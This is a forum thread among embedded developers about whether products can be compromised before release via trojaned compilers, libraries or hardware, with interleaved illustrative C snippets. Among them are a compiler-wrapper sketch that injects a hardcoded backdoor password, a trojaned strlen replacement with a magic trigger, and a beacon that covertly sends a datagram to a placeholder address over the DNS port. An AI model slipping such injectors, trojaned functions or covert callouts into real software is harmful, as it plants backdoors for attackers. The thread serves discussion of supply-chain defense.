A group of colleagues and I regularly meet up (somewhere) a few
times annually to exchange ideas and libations. It was my turn
to host this past week.
Lots of stuff gets discussed at these get-togethers -- which, of
course, is the reason for the "inconvenience" of having to fly around
the country to attend them!
One idea that developed over a dinner was the possibility of a
*developer* (business/individual) being targeted prior to product
release. I.e., to embed malware in the product AS RELEASED ("infected
from birth").
We're all "bare metal" developers (hardware and software). As a result,
we INITIALLY were relatively confident in ASSUMING that we would pose a
less "accommodating" attack surface for a blind "pre-release" attack;
the attacker would have no foreknowledge of the development language,
target OS, even the processor family in use!
OTOH, folks building on Windows, Linux or any other COTS platform could
probably be easily identified (fingerprint the file names in their
repository) and silently infected. Furthermore, as most of those folks
would probably be relying on many prebuilt libraries, one of those binary
packages could be infected and not be detected before linking (static or
dynamic).
[Does your build system know if a file has been altered since the last
make(1)? Or, does it simply rely on a timestamp to determine this??]
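[For the curious: a minimal sketch of what a content-based check could
look like, in contrast to make(1)'s timestamp test.  The MANIFEST name
and the FNV-1a hash are my own choices, purely for illustration -- a
real tool would use a cryptographic hash, since FNV collisions are
trivial to forge.

/* Content-based change detection -- a toy alternative to make(1)'s
 * timestamp test.  Hash each file and compare against a previously
 * recorded manifest; a tampered file is caught even if its mtime
 * has been carefully restored.
 */
#include <stdio.h>
#include <stdint.h>

static uint64_t fnv1a_file(const char *path)
{
    uint64_t h = 1469598103934665603ULL;    /* FNV-1a offset basis */
    FILE *f = fopen(path, "rb");
    int c;

    if (f == NULL)
        return 0;
    while ((c = fgetc(f)) != EOF) {
        h ^= (uint64_t)(unsigned char)c;
        h *= 1099511628211ULL;              /* FNV-1a prime */
    }
    fclose(f);
    return h;
}

int main(void)
{
    /* manifest lines: "<hex-hash> <path>", written by a prior run */
    char path[1024];
    unsigned long long recorded;
    int dirty = 0;

    FILE *m = fopen("MANIFEST", "r");
    if (m == NULL)
        return 1;
    while (fscanf(m, "%llx %1023s", &recorded, path) == 2) {
        if (fnv1a_file(path) != (uint64_t)recorded) {
            printf("ALTERED: %s\n", path);
            dirty = 1;
        }
    }
    fclose(m);
    return dirty;
}

Of course, this just moves the problem: the manifest -- and the
checker itself -- now have to be protected from the same attacker.]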
For COTS systems, the developer might not even have the sources
available for the library that is targeted! I.e., "make world"
leaves the library files untouched!
OTOH, most of us use toolchains that are publicly available (COTS
or FOSS) so the tools themselves could be targeted to inject the
specific malware into the objects -- regardless of whether or not the
binaries are ever rebuilt! (e.g., in the spirit of Ken Thompson's
hack).
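(To make the "shape" of such a tool-resident attack concrete -- this
is NOT Thompson's actual code, just a caricature, and the trigger and
payload strings are invented:

/* Caricature of a Thompson-style attack living in a compiler (or a
 * trojaned wrapper around one): recognize WHAT is being compiled by
 * matching on the source text, then splice extra source in before
 * the real compiler sees it.  Trigger and payload are invented
 * placeholders.
 */
#include <stdio.h>
#include <string.h>

static const char *TRIGGER = "check_password";            /* invented */
static const char *PAYLOAD =
    "if (strcmp(pw, \"letmein\") == 0) return 1;";        /* invented */

/* Copy src_path, injecting PAYLOAD just inside the body of any
 * function whose definition mentions TRIGGER.  Returns the path the
 * real compiler should be handed.
 */
const char *maybe_infect(const char *src_path)
{
    char line[4096];
    int armed = 0, hit = 0;
    FILE *in = fopen(src_path, "r");
    FILE *out = fopen("/tmp/doctored.c", "w");

    if (in == NULL || out == NULL) {
        if (in)  fclose(in);
        if (out) fclose(out);
        return src_path;
    }
    while (fgets(line, sizeof line, in) != NULL) {
        fputs(line, out);
        if (strstr(line, TRIGGER) != NULL)
            armed = 1;                  /* found the target function */
        if (armed && strchr(line, '{') != NULL) {
            fprintf(out, "    %s\n", PAYLOAD);  /* body just opened */
            armed = 0;
            hit = 1;
        }
    }
    fclose(in);
    fclose(out);
    return hit ? "/tmp/doctored.c" : src_path;
}

Note what the attack NEEDS: recognizable source.  That is exactly what
a bare-metal codebase of unknown structure denies it.)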
Again, I suspect this is practically impossible for the GENERIC class
of embedded apps -- the attacker has no way of knowing WHICH aspect(s)
of a particular design to target!
The more interesting question is whether or not some "common" facility
(e.g., some part of stdio/stdlib/math/etc.) could be compromised in
a manner that would yield an effective "in" for a system of UNKNOWN
(to the attacker) capabilities/functionality -- while, at the same
time, remaining innocuous enough that it doesn't prematurely reveal
itself to developers of systems that CAN'T be compromised by that
technique!
(I.e., if folks started noticing that, for example, strlen(3c) was
"misbehaving" and explored the issue, they would discover such an
attack before it had the opportunity to "bear fruit" -- in some OTHER
system/product/application)
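(For concreteness, here's what a trojaned strlen(3c) -- linked in
place of the real one by a compromised library -- might look like.
The trigger bytes are invented; the point is that the always-executed
test is nearly free, yet the FIRST developer whose data happens to
contain the trigger sees strlen "misbehave", investigates, and burns
the exploit for every OTHER product:

/* Hypothetical trojaned strlen(3c): identical behavior for all
 * inputs except one magic (invented) 8-byte prefix.  Meant to
 * replace the libc version at link time.
 */
#include <stddef.h>

size_t strlen(const char *s)
{
    static const char magic[8] = { 'B','D','!','7','q','Z','^','k' };
    const char *p = s;
    size_t i;

    while (*p != '\0')
        p++;

    /* trigger check: does the string start with the magic prefix? */
    if ((size_t)(p - s) >= 8) {
        for (i = 0; i < 8 && s[i] == magic[i]; i++)
            ;
        if (i == 8) {
            /* payload would go here -- e.g., flip a flag, patch a
             * vector.  Returning a wrong length stands in for the
             * "misbehavior" a developer would eventually notice: */
            return (size_t)(p - s) - 1;
        }
    }
    return (size_t)(p - s);
}

Note that it can't know whether the caller is handling a password, a
DNS name, or a log message -- which is precisely the attacker's
problem.)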
So, given NO knowledge of the targeted application domain, hardware,
OS, etc., can you imagine a PRACTICAL exploit that would put designs
at risk, "from birth"?
Possible "attack surface" pre-release exploit?
Started by Don Y ● October 2, 2016
Reply by Allan Herriman ● October 2, 2016
On Sun, 02 Oct 2016 03:56:43 -0700, Don Y wrote:

[original post snipped]

> So, given NO knowledge of the targeted application domain, hardware,
> OS, etc., can you imagine a PRACTICAL exploit that would put designs
> at risk, "from birth"?

The Ken Thompson C compiler hack
http://c2.com/cgi/wiki?TheKenThompsonHack
was pretty good at persisting on Unix systems.

Regards,
Allan
Reply by Don Y ● October 2, 2016
On 10/2/2016 4:16 AM, Allan Herriman wrote:
>> OTOH, most of us use toolchains that are publicly available (COTS
>> or FOSS) so the tools themselves could be targeted to inject the
>> specific malware into the objects -- regardless of whether or not
>> the binaries are ever rebuilt! (e.g., in the spirit of Ken
>> Thompson's hack).
>>
>> So, given NO knowledge of the targeted application domain,
>> hardware, OS, etc., can you imagine a PRACTICAL exploit that would
>> put designs at risk, "from birth"?
>
> The Ken Thompson C compiler hack
> http://c2.com/cgi/wiki?TheKenThompsonHack
> was pretty good at persisting on Unix systems.

But I can't see it extending beyond a system that has a "login(1)"
executable!  E.g., I'd wager I could use HIS hacked compiler today and
its exploit would never manifest (because my authentication scheme is
entirely different; there's no concept of a "login" -- despite the
system being designed for security!)

(His exploit only worked because he was targeting a very specific
application.  I'd imagine it could be defeated by globally
substituting "account" for "login" in the entire source tree.)

I think the amount of heuristics required to attack a GENERIC system
is simply too great for a general-purpose "infestation".  E.g., my
visiting colleagues, KNOWING the nature of my project (or any of the
projects of the other colleagues), could spend days WITH my sources
and still find it difficult to "infect" them in a way that would
persist (and not be detected!) until "release".  Ask them to come up
with an attack plan with NO knowledge of the system and they'd be
helpless!
Reply by Dimiter_Popoff ● October 2, 2016
On 02.10.2016 13:56, Don Y wrote:

[original post snipped]

> So, given NO knowledge of the targeted application domain, hardware,
> OS, etc., can you imagine a PRACTICAL exploit that would put designs
> at risk, "from birth"?

Hi Don,

if your end product uses someone else's networking stack you have no
option but to trust the stack provider -- and their compiler provider,
etc.  You are vulnerable/defenceless by definition.

And if the product is not networked it is unlikely to be a real target
anyway.

You may come to realize/appreciate why I do things the way I do them
:-).  Maybe I have to put together some package for commercial
consumption; how many others are there which are completely under the
control of a single person in the context above?

Dimiter

------------------------------------------------------
Dimiter Popoff, TGI             http://www.tgi-sci.com
------------------------------------------------------
http://www.flickr.com/photos/didi_tgi/
Reply by Don Y ● October 2, 2016
On 10/2/2016 8:13 AM, Dimiter_Popoff wrote:
> if your end product uses someone else's networking stack you have
> no option but to trust the stack provider -- and their compiler
> provider, etc.  You are vulnerable/defenceless by definition.

That's the case with *any* "component" in your design.  And, it
doesn't imply that your "supplier" is malicious; rather, that because
it is now a "Standard Product" (component -- be it hardware or
software), others can freely explore its operation "under cover of
secrecy" and discover its weaknesses -- then craft exploits targeting
those weaknesses and use them against any of that vendor's customers!

> And if the product is not networked it is unlikely to be a real
> target anyway.

But anything with a "data port" is effectively networked.  E.g., if
you have a USB port that allows folks to {up,down}load "stuff", then
that's a potential attack vector: get someone to plug in a thumb drive
with malware that you haven't prepared for and you're now a target.

> You may come to realize/appreciate why I do things the way I do
> them :-).  Maybe I have to put together some package for commercial
> consumption; how many others are there which are completely under
> the control of a single person in the context above?

Among my colleagues (see my original post), all of the *deployed*
software is completely "home grown" -- no third-party libraries, OSs,
etc.

Of course, components with internal (factory-controlled) microcode
leave them vulnerable to that attack vector.

And, as I said, the *tools* that we use represent another opportunity
for "compromise".

But, I can't see a mechanism that could be exploited "in general" to
target the "pre-release" ecosystem that wouldn't need specific
knowledge of the type of application, target hardware, etc.

Said another way: if a capable colleague could spend a considerable
amount of time examining YOUR codebase (that time being the equivalent
of opcode fetches running on an AI that had infected your system),
what could he/she learn that would enable them to compromise someone
*else's* product?  (WITHOUT being able to spend that sort of effort,
there!)

Sunday lunch: Finestkind!
Reply by Dimiter_Popoff ● October 3, 2016
On 02.10.2016 22:03, Don Y wrote:
> On 10/2/2016 8:13 AM, Dimiter_Popoff wrote:
>> if your end product uses someone else's networking stack you have
>> no option but to trust the stack provider -- and their compiler
>> provider, etc.  You are vulnerable/defenceless by definition.
>
> That's the case with *any* "component" in your design.  And, it
> doesn't imply that your "supplier" is malicious; rather, that
> because it is now a "Standard Product" (component -- be it hardware
> or software), others can freely explore its operation "under cover
> of secrecy" and discover its weaknesses -- then craft exploits
> targeting those weaknesses and use them against any of that vendor's
> customers!

Hi Don,

indeed "every" component of a system can do that.  Well, every one of
sufficient complexity, that is.  Resistors and caps have been known to
be pretty tame these days :-).

Where I put the line is between software and hardware.  I cannot
control the silicon -- I buy it, so I let it do whatever it does.
Obviously just a single opcode or exception etc. can be made to invoke
some function I am not aware of.  I don't think I have seen symptoms
of that yet, but then how could I know?

BUT I can control the software as long as every piece of it comes from
me -- from the toolchain to the end product.  Leave one alien line --
one alien-generated opcode -- in, and you are on the other side of
this line.

> Said another way: if a capable colleague could spend a considerable
> amount of time examining YOUR codebase (that time being the
> equivalent of opcode fetches running on an AI that had infected your
> system), what could he/she learn that would enable them to
> compromise someone *else's* product?

I think you are looking from too close at this one.  Such an attack --
say, through the network stack or through the compiler or -- to be
completely out of our control -- via the MAC and its DMA, which may be
smarter than we are told -- does not need to know what the device it
is attacking is.  All it needs is to establish a connection, just say
"here I am", and let the attacker's people worry about it later, when
they know more about it through other channels (market popularity,
espionage, etc.).

Dimiter

------------------------------------------------------
Dimiter Popoff, TGI             http://www.tgi-sci.com
------------------------------------------------------
http://www.flickr.com/photos/didi_tgi/
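(For a sense of scale, the "here I am" Dimiter describes really can be
this small.  A sketch, assuming only that SOME IP stack is reachable
-- POSIX sockets are used for illustration, and the rendezvous address
is an invented placeholder:

/* The entire "payload" of a blind announce-yourself attack: send one
 * innocuous-looking datagram and let the attacker sort out what the
 * device is later.  Nothing here depends on the application, the OS
 * proper, or the hardware -- only on reaching a socket API.
 */
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

static void here_i_am(void)
{
    struct sockaddr_in dst;
    int s = socket(AF_INET, SOCK_DGRAM, 0);

    if (s < 0)
        return;                     /* fail silently -- stay hidden */

    memset(&dst, 0, sizeof dst);
    dst.sin_family = AF_INET;
    dst.sin_port = htons(53);       /* blend in with DNS traffic */
    inet_pton(AF_INET, "192.0.2.1", &dst.sin_addr);  /* invented */

    sendto(s, "hi", 2, 0, (struct sockaddr *)&dst, sizeof dst);
    close(s);
}

Fingerprinting, staging, and everything device-specific happen on the
attacker's side, afterwards.)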
Reply by Paul Rubin ● October 3, 2016
Dimiter_Popoff <dp@tgi-sci.com> writes:
> indeed "every" component of a system can do that.  Well, every one
> of sufficient complexity, that is.  Resistors and caps have been
> known to be pretty tame these days :-).

You have some device with two terminals that says "resistor" or
"capacitor" on the package.  How do you know what it -really- does?
You obviously can't tell merely by testing.

I once bought a "random parts" box that included a number of resistors
that were accompanied by X-ray pictures of the resistors.  I figured
at the time that the X-rays were to check for defects in the resistor
material, but I guess it could also have been to check for hidden
microprocessors.  Of course, now that X-ray machines are digital, they
can be backdoored...
Reply by Dimiter_Popoff ● October 3, 2016
On 03.10.2016 09:18, Paul Rubin wrote:
> You have some device with two terminals that says "resistor" or
> "capacitor" on the package.  How do you know what it -really- does?
> You obviously can't tell merely by testing.

Indeed so :-).  My perception of what is tame may well be outdated...

I suppose we will have to use just bleeding-edge passive parts, to
minimize the space they have in which to build trojan horses... :).
And/or build our own X-ray machines, of course.

Dimiter
Reply by Don Y ● October 3, 2016
Hi Dimiter,

On 10/2/2016 10:58 PM, Dimiter_Popoff wrote:
> Where I put the line is between software and hardware.  I cannot
> control the silicon -- I buy it, so I let it do whatever it does.
> Obviously just a single opcode or exception etc. can be made to
> invoke some function I am not aware of.  I don't think I have seen
> symptoms of that yet, but then how could I know?

But more and more "bits of hardware" are becoming "programmed state
machines".  E.g., newer NICs are essentially specialized processors
with their own microcode, etc.  And, of course, *processors* now have
writeable control stores... (welcome to the past!  :>)

> BUT I can control the software as long as every piece of it comes
> from me -- from the toolchain to the end product.  Leave one alien
> line -- one alien-generated opcode -- in, and you are on the other
> side of this line.

Yes, but (I suspect) in practical terms (at least for toolchains), I
doubt there is much risk.  I.e., a smart malware could inject code
into any library function you have on your system to virtually
GUARANTEE that the code fragments *will* get executed at some time
while your product is "running".  (A malevolent bit of the toolchain
just has more opportunities to do this!)

Yet, without some knowledge of what your code is trying to do, it's
hard to imagine such an exploit being effective -- BEFORE being
discovered in some case where it interfered with normal operation of
the device (e.g., anyone watching code execute with a logic analyzer
would be able to notice this injected code -- no way the code could
know that the bus was being snooped by such a device!)

Infections seem to try to target higher levels in
devices/products/systems... places where the functionality of the
embodying code is reasonably well known (e.g., a network stack, a
system utility, etc.).

E.g., memcpy(3c) (or, worse, copyin/out) is undoubtedly used in lots
of places where it *could* significantly affect the operation of the
device.  But it, by itself, doesn't have any awareness of the semantic
value of each invocation... it doesn't know if the arguments point to
special kernel buffers or just a line of text for an error message.
OTOH, res_mkquery(3) has a much more refined role in a system!

> I think you are looking from too close at this one.  Such an attack
> -- say, through the network stack or through the compiler or -- to
> be completely out of our control -- via the MAC and its DMA, which
> may be smarter than we are told -- does not need to know what the
> device it is attacking is.  All it needs is to establish a
> connection, just say "here I am", and let the attacker's people
> worry about it later, when they know more about it through other
> channels (market popularity, espionage, etc.).

But an arbitrary (infected) piece of code can't KNOW how to access the
NIC in any "random" piece of hardware (unless it is embedded in a
piece of code known to talk to that hardware device!).  Just like a
piece of code that computes the hash of a password can't know that the
string it is examining *is* a password (unless that piece of code
resides in a function named "hash_user's_password()"!)

As such, codebases that can indirectly be examined "from afar" --
because they incorporate COTS or FOSS modules of known characteristics
-- are the only viable attack vectors (at least, that's my
contention!).

If I label my functions:

    function_0001() ...
    function_0002() ...
    function_0003() ...

an attacker would have no idea whether function_0001() wasn't, in
fact, "hash_user's_password()"!
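(What that scrubbing might look like in practice -- a hypothetical
release-build header; every name below is invented for illustration:

/* scrub_names.h -- hypothetical header, included everywhere in
 * release builds, that maps each meaningful identifier to an opaque
 * one.  Development builds keep readable names; the shipped objects
 * and map files carry only function_NNNN.
 */
#ifndef SCRUB_NAMES_H
#define SCRUB_NAMES_H

#ifdef RELEASE_BUILD
#define hash_users_password   function_0001
#define verify_credentials    function_0002
#define unlock_actuator       function_0003
#endif

#endif /* SCRUB_NAMES_H */

Stripping symbols achieves much of the same for executables, but
linkable libraries and map files still leak names -- hence the
source-level rename.)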
Reply by Dimiter_Popoff ● October 3, 2016
On 03.10.2016 10:15, Don Y wrote:
>> BUT I can control the software as long as every piece of it comes
>> from me -- from the toolchain to the end product.  Leave one alien
>> line -- one alien-generated opcode -- in, and you are on the other
>> side of this line.
>
> Yes, but (I suspect) in practical terms (at least for toolchains),
> I doubt there is much risk.

Hi Don,

my point is exactly that once this line has been crossed it becomes a
matter of trust vs. doubt.  I cannot speculate on the probabilities;
in fact, I don't think any of us here can, unless directly involved in
such work for some agency.  What is done there is just beyond my
horizon and, frankly, beyond my interest.  I just stay on my side of
the line.

> But an arbitrary (infected) piece of code can't KNOW how to access
> the NIC in any "random" piece of hardware (unless it is embedded in
> a piece of code known to talk to that hardware device!).

Uhm, yes, but platform discovery becomes less and less difficult as
the choices of silicon get narrower and narrower.  I would not bet a
lot on that.

Dimiter

------------------------------------------------------
Dimiter Popoff, TGI             http://www.tgi-sci.com
------------------------------------------------------
http://www.flickr.com/photos/didi_tgi/